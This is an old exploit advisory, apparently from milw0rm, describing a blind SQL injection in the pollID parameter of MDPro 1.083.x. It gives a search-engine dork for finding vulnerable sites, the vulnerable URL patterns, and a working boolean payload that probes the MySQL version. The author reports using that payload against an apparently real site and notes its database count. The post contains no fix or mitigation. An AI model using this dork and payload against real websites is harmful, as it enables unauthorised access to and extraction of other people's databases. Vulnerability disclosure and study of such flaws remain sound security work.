[!]Information_schema:
[Product: MDPro v 1.083.x ]
[site: www.maxdev.com ]
[Vuln: Blind $QL Injection (pollID) ]
[Author: XaDoS ~ thanks to S3rg3770 ]
[dork: inurl:modules.php?op= "pollID"]
[ "Powered By MDPro" ]
[~] Vuln: (PollID)
http://www.site.com/[MDPro_path]/modules.php?name=Surveys&op=results&pollID=[SQL]
or
http://www.site.com/[MDPro_path]/modules.php?op=modload&name=NS-Polls&file=index&req=results&pollID=[SQL]
[~] DeMo:
For example, if yuo want see the version of MySql write:
http://www.site.com/[MDPro_path]/modules.php?name=Surveys&op=results&pollID=+and+substring(@@version,1,1)=5#
Like:
http://www.xxx.it/modules.php?op=modload&name=NS-Polls&file=index&req=results&pollID=73+and+substring(@@version,1,1)=5# [work]
so v => 5.0.0 (this site have 96 databases) :)
[~] Note:
If yuo want exploit for this vuln write it by yuorself. I'm really Busy.
thanks to s3rg3770 and warwolfz Crew
\*Everything that gives pleasure has its reason. To scorn the mobs of those who go astray is not the means to bring them around*/ C.Baudelaire
Have Fun :D
# milw0rm.com [2009-06-25]